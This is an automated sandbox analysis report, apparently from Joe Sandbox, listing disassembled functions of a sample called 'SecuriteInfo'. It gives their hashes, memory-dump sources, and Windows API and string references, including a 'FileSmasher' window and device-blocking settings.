Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: _R
API String ID: 0-1717569336
Opcode ID: 6a899950d644ea6c2f1223bfce1993f84289e9e169b9015a73e9daa37bf58242
Instruction ID: 33cc46f2cd2d5a11e31b00db56349fe57dfa520c6097e1a64061c56b9414d117
Opcode Fuzzy Hash: 6a899950d644ea6c2f1223bfce1993f84289e9e169b9015a73e9daa37bf58242
Instruction Fuzzy Hash: D461DFB19542558AEB649B20DC80BEAB3B5EF94300F1091FAD44D97690EB794FC2CF1A

Function 004784C0 Relevance: .6, Instructions: 583COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a96658aefed841e4bd1c4b03aa5248894c2a3c5282d08f0adfd1d647e6ad7330
Instruction ID: 57ecc883dded93a6826be8cd0c8434ba9d8dd7aeb52d8098ae97e57450000a07
Opcode Fuzzy Hash: a96658aefed841e4bd1c4b03aa5248894c2a3c5282d08f0adfd1d647e6ad7330
Instruction Fuzzy Hash: 0812C5BBB983194FDB48CEE5DCC169573E1FB98304F09A43C9A55C7306F6E8AA094790

Function 00402500 Relevance: .3, Instructions: 257COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID:
API String ID: 3728558374-0
Opcode ID: 633ee63756c80194708ffb94b0149ee78c3c90c548190b0d43f5b3b72c9c1deb
Instruction ID: 3677c2a4413e502bcac265b81ae0569689aa7f27a1f6e73044c802614a20508c
Opcode Fuzzy Hash: 633ee63756c80194708ffb94b0149ee78c3c90c548190b0d43f5b3b72c9c1deb
Instruction Fuzzy Hash: A8A1A872E002199BCB08DF58C99469EB7B5BF88304F14862EE815AF3C5D7B4AD05CB94

Function 004691E0 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID:
API String ID: 3728558374-0
Opcode ID: 77aac56f1d1a1857128cc2b0c03723614993600f6ea0f0020443928b163469c0
Instruction ID: 4dd7f5fea67a9056919ad71094925f089c17a544d939846a72cc41f690565716
Opcode Fuzzy Hash: 77aac56f1d1a1857128cc2b0c03723614993600f6ea0f0020443928b163469c0
Instruction Fuzzy Hash: 3891F572A001099BCF08DF59C951A9FB769EF88310F14C55AEC15AF385EA74EE01CBD6

Function 00473410 Relevance: .3, Instructions: 252COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID:
API String ID: 3728558374-0
Opcode ID: a015cf120877a21603ec045d55e2b7f3f109f87661db037ec0fc580de9e2ea39
Instruction ID: 6a1c6e705c92f7a7c02983def6f2b28f5922113239dd9ca6b282ba25789aee51
Opcode Fuzzy Hash: a015cf120877a21603ec045d55e2b7f3f109f87661db037ec0fc580de9e2ea39
Instruction Fuzzy Hash: 879187B1E002598FCB08DFA8C951A9EB776FB84704F04852EE906AF349DB74A915CBD4

Function 004613D0 Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID:
API String ID: 3728558374-0
Opcode ID: b70eaf278282e35328a0d2ba4a674d60c0019ebad504965391d437f2d7b45846
Instruction ID: d33865a5dc4722aafc62be55b774aabf7c3c433bd2a2dd5ecf3d23d6f1562335
Opcode Fuzzy Hash: b70eaf278282e35328a0d2ba4a674d60c0019ebad504965391d437f2d7b45846
Instruction Fuzzy Hash: C791A376A001099FCB08DF59C981AAEB7B5FF88314F18811AED059B351EB34EE15CBD5

Function 00408A24 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09003370ddbeac6d7f79fa62771aaa20b1e3ab036e2d477f646bb6f057d7b023
Instruction ID: f063c57a0dabc482292aec8050cb7aba3f0ac2d34f54dfccecc4f6f3c4bfb5c3
Opcode Fuzzy Hash: 09003370ddbeac6d7f79fa62771aaa20b1e3ab036e2d477f646bb6f057d7b023
Instruction Fuzzy Hash: A781D1B2D041258FE724CB24DD44AEBB775EF84310F1481FBD80DAB680D6399EC68E56

Function 0041F03F Relevance: .2, Instructions: 191COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ad7e7203b345e49e4f71024ed2eb8ec98ec26353f68e507fd977b384baccd9b
Instruction ID: 6494ec129c83242b6daf9547522e9dfff5b5f491bef143265462a3c076d8989e
Opcode Fuzzy Hash: 2ad7e7203b345e49e4f71024ed2eb8ec98ec26353f68e507fd977b384baccd9b
Instruction Fuzzy Hash: E171DFB1E012599FE7248B20DC90BEA7375EF94300F1481FED50DA7680E6795EC68B16

Function 00414893 Relevance: .2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbfa4870adc45b631622be3ca2592a958701174f62ce168f61f50a2c33284457
Instruction ID: 48852144169400102215830900a77111febc21c0817d92a7057d820840cf8b63
Opcode Fuzzy Hash: dbfa4870adc45b631622be3ca2592a958701174f62ce168f61f50a2c33284457
Instruction Fuzzy Hash: F45106B2E041249AEB248B24DD84BFA7775EBC5310F1081BBE90E67684D67C5EC1CF5A

Function 0041F3CA Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e41e33966c3855ee0846b852d59e17cb576933712ec70472871c3b51452ea398
Instruction ID: 125683a819a8461f6143165e45d549a0956de99d57c186ba92652505749cb299
Opcode Fuzzy Hash: e41e33966c3855ee0846b852d59e17cb576933712ec70472871c3b51452ea398
Instruction Fuzzy Hash: CD51CEB2D006288AE720CA25ED94BEBB775FF94314F0440FAE94D97640D67C1EC68F56

Function 0048C370 Relevance: .1, Instructions: 76COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: c4f854496fe7d8e591f69f599d75b85a0d4fbbe213d946b15adbcdf1b5ac5b02
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 61115BB724005243D614AA3DC8F45BFA395EBC532072C8B7BD8424B748D23AD997972C

Function 00471400 Relevance: 42.5, APIs: 13, Strings: 11, Instructions: 458COMMON

Download Yara Rule

APIs

Part of subcall function 00470440: FindResourceW.KERNEL32(?,0000006C,UIDATA,C1DE166F,?,00000008,?), ref: 00470497
Part of subcall function 00470440: LoadResource.KERNEL32(?,00000000), ref: 004704B5
Part of subcall function 00470440: SizeofResource.KERNEL32(?,00000000), ref: 004704D2
Part of subcall function 00470440: FreeResource.KERNEL32(00000000), ref: 004704E4

__wcsicoll.LIBCMT ref: 0047159B
__wcsicoll.LIBCMT ref: 004715DD
__wcsicoll.LIBCMT ref: 0047161C
__wcsicoll.LIBCMT ref: 00471737
__wcsicoll.LIBCMT ref: 00471761
__wcsicoll.LIBCMT ref: 004717A2
__wcsicoll.LIBCMT ref: 004717D0
__wcsicoll.LIBCMT ref: 00471802
__wcsicoll.LIBCMT ref: 00471830
__wcsicoll.LIBCMT ref: 00471862
__wcsicoll.LIBCMT ref: 00471890
__wcsicoll.LIBCMT ref: 004718C2
__wcsicoll.LIBCMT ref: 004718EA

Strings

functionlist, xrefs: 004716D4
FullMatch, xrefs: 00471595
block_driver_root, xrefs: 00471731
block_usb, xrefs: 0047179C
block_cdrom, xrefs: 004717FC
true, xrefs: 0047175B, 004717CA, 0047182A, 0047188A, 004718E4
PartialMatch, xrefs: 004715D7
WildMatch, xrefs: 00471616
filelist, xrefs: 00471453
block_ts_install_path, xrefs: 004718BC
block_network_driver, xrefs: 0047185C

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: __wcsicoll$Resource$FindFreeLoadSizeof
String ID: FullMatch$PartialMatch$WildMatch$block_cdrom$block_driver_root$block_network_driver$block_ts_install_path$block_usb$filelist$functionlist$true
API String ID: 4124783462-2946980336
Opcode ID: ef576852fa2554ff3049373fb4af8b44780cce50bc2945fbd94cd8f7a15b7642
Instruction ID: 196e8b991ad32f9fc743ae7f2f9937729bc14a5035108001dd5c4bc78a13c009
Opcode Fuzzy Hash: ef576852fa2554ff3049373fb4af8b44780cce50bc2945fbd94cd8f7a15b7642
Instruction Fuzzy Hash: 3602AE72900214DFCB10FBADC842BDEB3B4EF54324F15855AE919A7362D738AD05CBA9

Function 0042F050 Relevance: 39.0, APIs: 20, Strings: 2, Instructions: 451COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00000060,00000064,00000060), ref: 0042F0D0
GdipGetImageWidth.GDIPLUS(?,?,00000000,00000000), ref: 0042F0F0
GdipGetImageHeight.GDIPLUS(?,?,?,?,00000000,00000000), ref: 0042F107

Strings

`, xrefs: 0042F083
disable_resize, xrefs: 0042F479

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: GdipImage$HeightWidth
String ID: `$disable_resize
API String ID: 87155632-3937757610
Opcode ID: 16bcc2be455597a37ee2c0e034a38ca33b209642f50e7f2ed2079a1a766c81af
Instruction ID: c307404671f25e7990017633f83107532497deb9979d2006b0185ea9e34db0ac
Opcode Fuzzy Hash: 16bcc2be455597a37ee2c0e034a38ca33b209642f50e7f2ed2079a1a766c81af
Instruction Fuzzy Hash: 8D026A71A00219DFCB10DFA9D980AAEBBF5FF48314F50866EE815A7381D774AD05CBA4

Function 00462790 Relevance: 37.1, APIs: 17, Strings: 4, Instructions: 302windowthreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 004627BE
EnterCriticalSection.KERNEL32(?), ref: 004627D2
LeaveCriticalSection.KERNEL32(?), ref: 004627EA
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 00462820
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 0046282F
GetSystemMetrics.USER32(0000000C), ref: 00462846
GetSystemMetrics.USER32(0000000B), ref: 0046284B
LoadImageW.USER32(?,00000005,00000001,00000000), ref: 00462853
SendMessageW.USER32(?,00000080,00000001,00000000), ref: 00462868
GetSystemMetrics.USER32(00000032), ref: 0046287B
GetSystemMetrics.USER32(00000031), ref: 00462880
LoadImageW.USER32(?,00000005,00000001,00000000), ref: 0046288C
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0046289D
SetWindowTextW.USER32(?,-00000004), ref: 00462915
MulDiv.KERNEL32(00000082,?,00000064), ref: 00462A1A

Strings

tool_header_bg, xrefs: 00462A2F
FileSmasher\maindlg.xml, xrefs: 004628DE
FileSmasher, xrefs: 004628A5
IDS_WINDOW_TITLE, xrefs: 004628F1

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MetricsSystem$CreateCriticalEventImageLoadMessageSectionSend$CurrentEnterLeaveTextThreadWindow
String ID: FileSmasher$FileSmasher\maindlg.xml$IDS_WINDOW_TITLE$tool_header_bg
API String ID: 2178025920-2066410532
Opcode ID: 80b7c20c52323f7a20dcdbe1bc36ffb38e72473d230269f20547debb6dc53802
Instruction ID: f15ceb1fff673dbdcb3d588ef808f44365002a63d70d00c3430f4cc7cbce6478
Opcode Fuzzy Hash: 80b7c20c52323f7a20dcdbe1bc36ffb38e72473d230269f20547debb6dc53802
Instruction Fuzzy Hash: 70B1C371604340AFE710DF64CC85B5A77A8EF84B14F14452EF944AB2D1EBB9E805CB9A

Function 00444290 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 117registrywindowCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(004E38E8,CrashReport.dll,-00000010,00000000), ref: 004442A1
RegisterWindowMessageW.USER32(WM_ATLGETHOST,?,?,?,?,?,?,?,?,?,?,?,?,0043E5A6), ref: 004442B2
RegisterWindowMessageW.USER32(WM_ATLGETCONTROL,?,?,?,?,?,?,?,?,?,?,?,?,0043E5A6), ref: 004442BE
GetClassInfoExW.USER32(?,AtlAxWin90,?), ref: 004442DF
LoadCursorW.USER32 ref: 0044431B
RegisterClassExW.USER32 ref: 00444342
_memset.LIBCMT ref: 0044436E
GetClassInfoExW.USER32(?,AtlAxWinLic90,?), ref: 0044438B
LoadCursorW.USER32 ref: 004443CB
RegisterClassExW.USER32 ref: 004443F2
LeaveCriticalSection.KERNEL32(004E38E8,?,?,?,?,?,?,?,?,?), ref: 0044441D
LeaveCriticalSection.KERNEL32(004E38E8), ref: 00444433

Part of subcall function 004033D0: __recalloc.LIBCMT ref: 004033FC

Strings

WM_ATLGETHOST, xrefs: 004442AD
WM_ATLGETCONTROL, xrefs: 004442B4
AtlAxWin90, xrefs: 004442D0, 00444336
AtlAxWinLic90, xrefs: 00444381, 004443E6
CrashReport.dll, xrefs: 0044429B

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ClassRegister$CriticalSection$CursorInfoLeaveLoadMessageWindow$Enter__recalloc_memset
String ID: AtlAxWin90$AtlAxWinLic90$CrashReport.dll$WM_ATLGETCONTROL$WM_ATLGETHOST
API String ID: 3653313455-3137487555
Opcode ID: d45fea2451c69ab0c6fce59c63813c92c1ba7f286fed2cb9a3203dec539f89e4
Instruction ID: 18c47c28d217803acd38e2e350ea736b05d0220bbaa245b44b76b35cf6954bd6
Opcode Fuzzy Hash: d45fea2451c69ab0c6fce59c63813c92c1ba7f286fed2cb9a3203dec539f89e4
Instruction Fuzzy Hash: 59414BB55083409FC340DF56D888A2AFBE8FBC8755F404A2FF48893261D7B49A04CF9A

Function 0042A280 Relevance: 28.7, APIs: 19, Instructions: 225windowCOMMON

Download Yara Rule

APIs

CreateCompatibleDC.GDI32(?), ref: 0042A314
CreateCompatibleBitmap.GDI32(?,00000004,00000004), ref: 0042A324
SelectObject.GDI32(00000000,00000000), ref: 0042A32F
GdipCreateFromHDC.GDIPLUS(00000000,?), ref: 0042A340
GdipCreateSolidFill.GDIPLUS(000000FF,?,00000000,?), ref: 0042A357
GdipFillRectangleI.GDIPLUS(?,?,00000000,00000000,00000004,00000004,000000FF,?,00000000,?), ref: 0042A367
GdipDeleteBrush.GDIPLUS(?,?,?,00000000,00000000,00000004,00000004,000000FF,?,00000000,?), ref: 0042A377
GdipSetTextRenderingHint.GDIPLUS(?,00000003,?,?,?,?,?,00000000,00000000,00000004,00000004,000000FF,?,00000000,?), ref: 0042A3A9
GdipGetFontHeight.GDIPLUS(?,?,?,?,?,00000003,?,?,?,?,?,00000000,00000000,00000004,00000004,000000FF), ref: 0042A3D3
GdipCreateStringFormat.GDIPLUS(00005000,00000000,?,?,?,?,?,?,00000003,?,?,?,?,?,00000000,00000000), ref: 0042A3FD
GetPixel.GDI32(?,00000000,00000000), ref: 0042A476
